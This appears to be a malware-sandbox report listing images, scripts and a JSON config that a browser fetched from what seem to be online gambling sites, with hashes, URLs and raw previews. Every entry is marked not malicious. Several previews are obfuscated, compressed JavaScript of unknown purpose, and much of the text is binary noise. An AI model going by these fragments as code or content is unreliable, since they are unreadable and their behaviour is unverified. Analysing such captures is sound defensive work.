                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmpMM:InstanceID="xmp.iid:64AA320293A511EC9252A442C83F2742" xmpMM:DocumentID="xmp.did:64AA320393A511EC9252A442C83F2742"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:64AA320093A511EC9252A442C83F2742" stRef:documentID="xmp.did:64AA320193A511EC9252A442C83F2742"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...w..v.IDATx.....U.?..~...=.l*.@B...Rl.Q..Q@@.........D...(JSz....d....l..L..sf....@(.....d..;w..9..<..s.s.C.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2153
                                                                                                                                                          Entropy (8bit):7.350943969357906
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:u1hiyWwylZ82lYSqMHi4OyV7zT3XyJ3VyAvGbDEztGpW7gsC+lUQIl4jUM1+S3hu:0uinNuiY5eJ3fWD97+SdlGwwFLDe
                                                                                                                                                          MD5:168AAAAE57F32099066336ACA1A5A4D1
                                                                                                                                                          SHA1:56D836A065E0FF03F655BDAAB9D7FC66217648B5
                                                                                                                                                          SHA-256:DC31AA1C5B25425C763EEBC5B2B6917DE930A61A21EB9065A943679DE092F5E7
                                                                                                                                                          SHA-512:0E531989024A91FA559C84A7911D0ED1F1C1B7C335938A238AD36D3362389AD587EB7902BA2A100D0B24E043A712A5ED328DCE5A72F599600A3E0B3FF817F741
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_bbin_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:E7858501F77411E78A94DA59F900EF65" xmpMM:InstanceID="xmp.iid:E7858500F77411E78A94DA59F900EF65" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:66D1DD4E49E111E79B7D9577B3604CC5" stRef:documentID="xmp.did:66D1DD4F49E111E79B7D9577B3604CC5"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aws.bakeddove.com/ocs/cc.png?1717972858649
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2174
                                                                                                                                                          Entropy (8bit):7.384908592342893
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:LfvnLjICpccCeJ38q/f6t4ec5j1YF3TyF2X6rJeKuOeG7PKST2:7tp1C0e43SFVAeKDj+
                                                                                                                                                          MD5:D8F694E3F0C0988664245B10D5A27AEB
                                                                                                                                                          SHA1:ED357D33EF0912FB5812383A16B17FEA4CCE97DC
                                                                                                                                                          SHA-256:8BDF7D513B271DFDA54C8D1A197ED4F24C6755FE6642116FA004A1F4503BA655
                                                                                                                                                          SHA-512:21EA128A949D838AD3563C0DFC66F950355A4F782C4B9CDF25CF03BB29A894786E036AE86C096994C73E761F85E5A1DA168D1E7F427FA22886479917FDC66391
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7" xmpMM:DocumentID="xmp.did:52DC3AEA8A0411EA80BBD3E09B2B2EBA" xmpMM:InstanceID="xmp.iid:52DC3AE98A0411EA80BBD3E09B2B2EBA" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5bbece77-91f8-1d4c-bfc4-7cd89f8eb907" stRef:documentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...f....IDATx.WkL[e.~.B.-.....M.7t
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5360), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5360
                                                                                                                                                          Entropy (8bit):5.836765872172626
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VZhfutUiLM7KeKzCAuMOe/n9eOEGCCZuIri5ZqKczjWqnPClL0nXk6da:VZhfu1LMF8xMe1eOqCZR85c/WBLeXk/
                                                                                                                                                          MD5:D7BF198B02DDB477FD18BF5BC38D9A72
                                                                                                                                                          SHA1:F7CA7C4BF3CDDC6768FDF40087FFB998971D3498
                                                                                                                                                          SHA-256:4C0D85B0A09B7C634DF14FC01D0F8A39A8F2418A87ECEB7DB3AA0714B5D1BB91
                                                                                                                                                          SHA-512:BA6619E3E0F10CA3FDC578A91A04B160DE99B9ED41CD6F90FB587879E2E11242B215427B432B17C3C2C6BDC7BA8455A4EE150F114C57458D86BAED242637F844
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/t4045-index-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAZgF0AaAbwDEBPAEzAC4AzAVzRgBcBLdTEYqYtAEpSAIiZIQAAiRsATh3YiA3AHkwAKxDsAdNRAMOaEAAVZKCCFltKmfiID69kEgCyKakwA2IEWQBuUJ5MIHQAhAAMAL6CArq2xCKeKADmKL7MrJzcwrIgbEyyaJJs0bHU8SKcEEgAMhwy6SzsXGiYOXkFRRylaHF2ALYgaEyNmS1tpLn5hZIAXj19CYZIHHqjzdmTHTOeC+V2y6sgAEJQaEay61mt7dNFMHsVMpTeV+O3nZIojwdoegAeAGF0GwoIZLG9NlNPtQfglklBBscUP9ITctndJLI4SIJLI/AofMQMht0dCZkgcTBzJQAEocZIACzYaIm5KKEBxaCgflZHxmyRxSWShgAynk+RjPv0cf0UGAON4AHIgYBIRkoYCS9mSAAqsvliqJJOubO2RTAOOgVgudQaxKapv5RSYOLAKDYbBQ/QAkv1kqKNVqHWMoebJJRokoArJigBeUjPbx0UjAVZsRl0EQAJgArAAWCCo4iMkAM5lZ/MARiLvi9ECz+HCteI3gYbCz4V8EBQK2uWagYFQQTYRLAsDgyTMLGotJAFigHZEaBQAFpcguWcRx/ApygZ8Zexx+yIYENR5dIpFiBw49hSNYLFnOIMRNeH5Qn4lDHBfAp0FmviePUbA+qO/R0Peo7/GwgIABJZoAMk6AOaOgCqOoAXJ6+DAnhQLMsxZjUPqAgAokqorEfYpG6sRtK+Oqmp1EMEhhOExBJiEpDXthvYnGwaApte/78SIf7+qKsgwFm2YAGz5toEBoMkb5kNBsEISIgAY8oABwaANy2gAVSoA5JqAKHKWE4XhWYMDh6pztQviMrkDBZsybDVHQAD0bkABz4AA7Lg2aUIy2jUv0bl1lAsjJHkWb2GAOFoL+76qfBWaANJGgBc5oAqUaABc2pm4fhIi0ioACq1G0vYLgq
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (669), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):687
                                                                                                                                                          Entropy (8bit):5.217403162786378
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:1cuHAPIJAuIrVgl17rTAoIr9/7KVDI0RE+VgiF8+9Mn3IztQLPoIQBXjMnWIEnxJ:1cCAPIOuIxgPkoIhTK5ZG+VLF8+9O3IR
                                                                                                                                                          MD5:9EFC0DBB4505675569C5718E1977FE85
                                                                                                                                                          SHA1:3EFB0631C80E9B9B79153FC27BC7954F54E2A2C3
                                                                                                                                                          SHA-256:667589AACE8EDB644B6338298D68D9461AEEFA5864E18270C489BCB4CE7C6D44
                                                                                                                                                          SHA-512:E63A813F0055E0BE3C99C2F6F87E05E96077BF9939FDD26F8D50806409A446EC48021C521C5B3341A23AFE0B5ABDFB2CC4909EE7890D641F0BDB195EF2FD66BC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/js/gamebox/common/errors/templateWrap.js?v=1717580749344
                                                                                                                                                          Preview:define([],function(){return Class.extend({init:function(){this.getTemplateHeader()},buildEvent:function(){var _this=this;$(window).resize(function(){_this.resizeHeight()})},getTemplateHeader:function(){var _that=this;$.ajax({url:"/commonPage/error.html",dataType:"html",type:"POST",success:function(data){$("._top").html($(data).find("div._topOri"));$("._footer").html($(data).find("div._footerOri"))},complete:function(){_that.resizeHeight()},error:function(){console.log(".........")}})},resizeHeight:function(){var resizeObj=$("._center");var topObj=$("._top");var footerObj=$("._footer");resizeObj.height($(window).height()-topObj.height()-footerObj.height())}})});
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1380), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1380
                                                                                                                                                          Entropy (8bit):5.793775006412735
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VVlWw08EXYm/ZwDk5lOAO5HaNu9IRq0tjlIYtTm1qWG:VfWNIm2aIjHchjbm1k
                                                                                                                                                          MD5:04509D505B3AAFAFA9B91C94562074E8
                                                                                                                                                          SHA1:154785DE37CA0817F6449EF868436F7178E6E761
                                                                                                                                                          SHA-256:FF397F56C58A8E85397EADD86F51FE249DDD18C472255F40A9D0B6165ADCE251
                                                                                                                                                          SHA-512:77F5F7BB6E1848AD76ECF5FCE04227573D18B0813D2FC0299717EA5FE54F69BF442B0BC134F816C88617D3BA85ABC4D77E93BB693C34A5B1EC0D945F5BD45D5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/inside.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQwKO0Q6CBoHCPks/MAciDAI6zs3LzCBiAcLAZoOhx2IJi4ABz4gnYcABZLmFdgrg5BCfEhMAAQgA1QENQQiMQOKAcKByfaKTBHE5nNDkLjtcSAqDaBhcRzOKAJK50dD6KDLOwwBxoAASKH0AGp1AB6DFQcQgAC0EBgbLQvScLOS8S4+gYogE2wAyi8UMAGLkmnKFXlSO0UF9ElsdiqcoQmgYYAx1OpIaRgDCYC8JQASLwsDhZPYKXj8ITkYqXCovMWmEB2NqdbJlNCBjogABkkY+vqQdiQKrK2QN2g4ABUMSAUI7MC6DkphFckEayupYNwUlwAuoyhU7Pac07w50APzqQZzFDqBhXRuOgNB/jFpN5MSvMXPLMGVsbFjtMC+WOTia+QQMADMAFZcoIIWJ1hABw4JYn5TEtSBsWg3AZ4a7C+RjqdzlUNZf1CGJ/GSzAAD5/tk352O+XDatsZ7AII0ZVHKnSfnWwG/tGwGivo2BIUaxD7qQMDHDCIAnvmiLCF6IA+mKAhlMA3zynY0oANIAJIbKYlTqIQACCVjiA0VR2MKjJoMy/JOFIdhWEgDTPG8SjEbwHoBrabhSBmxhwHm8gFki5ABmhHChnYPR9FeFK3tGYbGU4163kZTrtABkqDjKSaWQKJk2b4FlGe51lmb4gYQQBSoBr+ZRKQ6zZDqQAageBuryoZcUgDqkEASmBSZWIKAtMcaBOHe8mPmRFFIFRSl4SABEAKKJJ0yyqO
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 19 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):475
                                                                                                                                                          Entropy (8bit):7.320862001098046
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7aH/6TXdMghNp6X6vZGPJgzzOKBGH0VlK87aRhWV:DH/6jS20YAJ6i87tV
                                                                                                                                                          MD5:D6EA5978CD32B85B13A19BA3F3366D1A
                                                                                                                                                          SHA1:2EB2528B4B76914C2D8B60F9B1CCE68083DB67B6
                                                                                                                                                          SHA-256:9F3C4D496D8B397A450CFA104710303D292D5A52275573DEED0FA65D47D4756A
                                                                                                                                                          SHA-512:139DF5D435F394C6E2BB03EC0806A02812A95F0BF0209CEAB9525E182382C9B2B7F1F61C49EB09C2287F1DEB7B8DCBB5314EE9796F718FC3A1581FBB48DDE24E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR................i....pHYs.................IDAT8...=..A.....^;%.(PIP Q.H6(....B.*.+.\.[.(.$.Q...).[..P....%....%...}..d.g.....|g....IJi.N`?..7..c....y.......".|.DD.4;.4D.0.m-"X..eYv..z..,.../...Q3{..UU....p..2.'\.yL.G...R.."..........qY..+..)p...fna+..ww3"*.2.1...P...R..q._.".o..xf.v7..b.SCD...2..;..U....*0."{..-"./..:.~.Q..............f...y....V..X.p...k.sC...8B6...EYD|.^..c0.".........a[>.pDL5;;92...'....L..R_.."....;b..+.....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, baseline, precision 8, 659x544, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):75656
                                                                                                                                                          Entropy (8bit):7.973251684846932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:aFt/QuDmbbvL7nMJ2DFOH9+8MFYPy2cKLnruYN1hM173nJ/s+YXxnFSj/dzvQ:uQs2DswFI9hfcIiYK5nObXLSLFvQ
                                                                                                                                                          MD5:B8D7A960A4B6C034F047FF01DD4D9C43
                                                                                                                                                          SHA1:59196BB3341EA91A5A55270224A76FDC20E0EA54
                                                                                                                                                          SHA-256:9F8AFC863F5B3C95ACB8B8006DBF54857C58C904170D2F89B372F0F29887923F
                                                                                                                                                          SHA-512:6613A02E861D4EAE2B2FFDAA58E8AE493855A831CA43D33C57AA54178509A0E0E02B5B0F1032F10EB912BE450447D3295209DD805C69FB740E613EB759FD923B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.............................................................................................................................................S....Adobe.d........... ..............................................................................................!1.A.."Qa.q.2...#B..R..b...$3r...C...%cs.45T..........................!1..AQa.."q2.B..#R..34.............?..l.3.+M..~.oe.I.YO..I.......*."*<v.HvI..'...L..\....On.Hd...d..Oo.`l9(.>....,.....2%.%...$E.tV.....l.m....Z.Y#l...Sh.~PF..5v{I...4&k,..Sp..6.;W.dv.,.....q...A.F..l.6. k.......L.u..@.e.....0....C....b4t.l..;f..6........&.#....aK.4..#..W..q..X|.b.G!..wjp.'*.3d..nT^{...../&..FoJ...#s..(..Q......).bn.2TsbM..6......UI.....Tk..C..l.).......+TJ.*.4..:..%.6Q......U.lGlNx...0...j$...(M.4./#N.tBL6.s...~.....E.d.r...lY[..#..o...5....;.tr....^AW.r.%..S|..C.....dpqy..7lT....7.......S..Z=...v..............U..g%.J'..9..l..g.{E,TT.... .G....d}.....V.....\....X$|.....~.........I6.7...7.,mFR<'...>m./..{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2193
                                                                                                                                                          Entropy (8bit):7.504164108906097
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:7ANn2N0J3vFP8/aikV1duaZiYMp0RsfvzSpjguvo1+709:c2UFPiZkV1duaZiYMp0yfvzbuA1J9
                                                                                                                                                          MD5:DB31E0B3F00CDF4D73572B716704F358
                                                                                                                                                          SHA1:D36AC069005C0D496FE8F1E951288A3788FBDFD6
                                                                                                                                                          SHA-256:49D0739165F2823B186324D2A3D0ED719A66740EAD4E9DA7B8A4C720D7079881
                                                                                                                                                          SHA-512:80A31CA23DDDA5A1F4CE75A04D2700F28B9AD814087E6AB1E82D2E3C16B840F78346DD0E283578C969D35C078E361CF09457178E527D896C5073884CE8BE8E2D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:F0690D77E8B411E8AA3D8F69252F8195" xmpMM:DocumentID="xmp.did:F0690D78E8B411E8AA3D8F69252F8195"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F0690D75E8B411E8AA3D8F69252F8195" stRef:documentID="xmp.did:F0690D76E8B411E8AA3D8F69252F8195"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>D8......IDATx..V.o.E.?sf..~..........H.....6D.1.......L|1.`...Mx...F.y .....1....F..*R.......{..........h..o.gf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2056), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2056
                                                                                                                                                          Entropy (8bit):5.8388011130643065
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Vstv7KD6GH33fXAeX9ENnJkTMn7QDVZVk1PWvrY:Vi0TH/DX9z4n7sjCPWvE
                                                                                                                                                          MD5:E2F2262AF0263C484C462CA095754BAF
                                                                                                                                                          SHA1:98DD870CDA75FEFA8AF6A90BD74BE542303871F7
                                                                                                                                                          SHA-256:76712A849134FAA240E227CBA1A28332089A5FD8C9C5672DD2CACEB00A1DA2E2
                                                                                                                                                          SHA-512:A05E3B576D4D75E1CCE7260B5E79BCF23ACE72823151EB6EE7CC1BBA93456FD19E251F92A1CE27A1D48640AD29C68065D0767539BC2A20660351A511BD743B23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/sportBet.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYBWAXQBoBvAIgCYAlALQBtqAuAMwFc0YAXAJbpMfciHICAlDS5IQAAiR8ATgP7UA3AHkwAKxD8AdABMQHAWhAAFZSgghlfAJ6Zx1APruQSALIpjXMwg1FQAblDMXCBsAIQADAC+khrhyvIoALwCmNQAIsYAHMDUkuRoWYZomCilSFk5uVwA9LQl5FD11AByAJoAHlptyp1xMBAcbQAWGZhVkpiUCeQ6+vyYUIYAtlAQAOIgfHwOSPPY1AJIADIoAOYWIedIACrKTlbMUE4PaCiCHF/kahISYoYAAZQgKEcACEDtRSKVKAIOMooJsAKrKZicHj8IRzSipeR8DKUPgoOAgNBsZQmMxQQJ8QzowTMQw3A4AYRQFIEIByTwpVLafEmIE20VFF0MovFICWIAyphg/hA6PoAEluZtIZY0HxMAASQzQVGbESSZLKA5cZRoYmTaUXABiUO2zGudzQAH5aaYOAzmEyWQI2Ry+AB1cB+AJBAASKCUmEkAGpqE1Nv5AiBDJM+JtmN7qCmQGmAMRNMBwthoQLMJYut0RT0WHG8QTCaTWvi2+1SpCGC4ttAAMhHMX7g+er3enwSSTKyYWSxWBgNG22EB8XD4UA7aBOCzkfDBIPBkJhBzYA4AGgvKMwUFBjNy0OYbm28Z3CVA0iT+xo2TULgACCug3CUOSGE0xbABYxigoYYIANIal0aZNPBIB9IYuhICUMpilU3DtvirjSESAgZO47IHK4gJIBefCwnwISLMkTKwIIoSKgIhhcQIPHkEysoStRtEGgIgKicE5C4JISTzoixh7lAn77smlDdr2lBigINx5mwcTtHiPGxLgwlihKbC4PO5AqjqO4gMYNZLosyx6Gu6xbDs+yHMcpyPMODwXC8bwfAC1A/H8kXAqCEJQsxcIIlQyJmpi2IkV+BJEiSZJCtSfr0oyzKshJ3K8vy1CCpSaAilZk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1091
                                                                                                                                                          Entropy (8bit):5.475838206015315
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilPEIuhF7i+xRH9/pHILgIXTIRtRB+rfjj:Yv1FLJxwewo9BGNoLgnQz
                                                                                                                                                          MD5:6A5DDF5AB8DF0DD531823B695D9CEC54
                                                                                                                                                          SHA1:B32CADC489DAEFE4005A0CA19D66B7EC2E22DF99
                                                                                                                                                          SHA-256:01D49EF60AA6079B6ADD6CA798FF4467F574D0A85CA9A5BE8E20C343C5DC87ED
                                                                                                                                                          SHA-512:B5BE08EC1DBA5179A91386D1E1B5B6A3087A8F2FD949B62F7381E1F495B4882B7C3BCA9B8F3143DF1CCAE611764E09146562140A9E27EE50C6E0D6E17871D34F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":null,"webPath":"t4043","httpsSupport":0,"analyticsJs":"","loginLogo":null,"name":".......","onlineCustomerServiceUrl":"https://js2.jxxh8.icu/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":null,"snStatus":1,"webTitle":".......","isMaintain":0,"isBlock":"0","fromIp":"173.254.25
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 40 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1764
                                                                                                                                                          Entropy (8bit):7.776830052416948
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:1HvkM7OmItaKmsXVfIHyqXBGQBLJwlxIjQsEtD1:ZkM7zItaKxfwNRGQBJkT1D1
                                                                                                                                                          MD5:75A9E8C3EE2C7795BB666878746A3502
                                                                                                                                                          SHA1:164092B3B40164DE21DB3A45AF390460156B9593
                                                                                                                                                          SHA-256:24343D147FE93D222469B5C9F104A49BC598AE3EB7407B5327C81FC44E6BE34D
                                                                                                                                                          SHA-512:3870A98DA30A6BF2B0FB13CFAFB2C5B27B6C5DE169C08934E894B4E61A6AB92EDB97FBF56ADB53AD51D6E4828E2AA23F9DAE182383CCDA2693BDDFF9BDDD604A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_pg.png
                                                                                                                                                          Preview:.PNG........IHDR...(..........F......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.....'.hj.....IDATH..OlT.......o.3.3..gL..;..88q..*.e..&..J.X..%j..Ub.M......T.f......nKS....U....aR..;3h.7....x..t.....=.~.|.|.......w3..---)!...hA..r............CCC'...{.d.].4.R|]..@......*.Z.'..A.....{...].700.C...j...w.m{. ..u....4.@)"&..4...u..}x...Ge....1V...n.....In..7b.X.Zp((.........(.0...q...T*...05..U..L..|...l#4?...._.?...i.j.&.i.Z...F9u.........Z.......!.X.U).7...ok,/.T.'x..i....R.J.B....G..&...|.5xy].>....|.k..-..T..j.PT.U<....LMM...8v..]]]...!..~7.....B.)...H&S....yH).m.)%.o.&..3..%~.S.X'./......e.5.7.M.P.}:;..<...q.,..u....%..J.8r.H..Uk...,.O............np.4.....?O.\f...j...'1L.......R3..l#......>ei.(\......r9....in..7d..]l....]...B.:.=z.T*.....R.j..R.G../.d...|.~....gC.)%......#..k......V..Y....A&.!..c.6.a....D.E.&jE...!.L.+..[.s.^......ydBi.E3b.0..xE.<.k.c3+.J.......<. .2N...>..7..}....&&&.,......D.y. ...eg|...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3025
                                                                                                                                                          Entropy (8bit):7.319734930728658
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:w/6IZvnqknA9WBG49p2+cJ31jqbqv3MHeIXvBZN3LKa23A2HJGJMZ4dFlOx93j1:wSOqknmWBXp2+ZHeAz3LKa12HJGYulO1
                                                                                                                                                          MD5:0A9BEECE1981A4A0840BE4FCABED1709
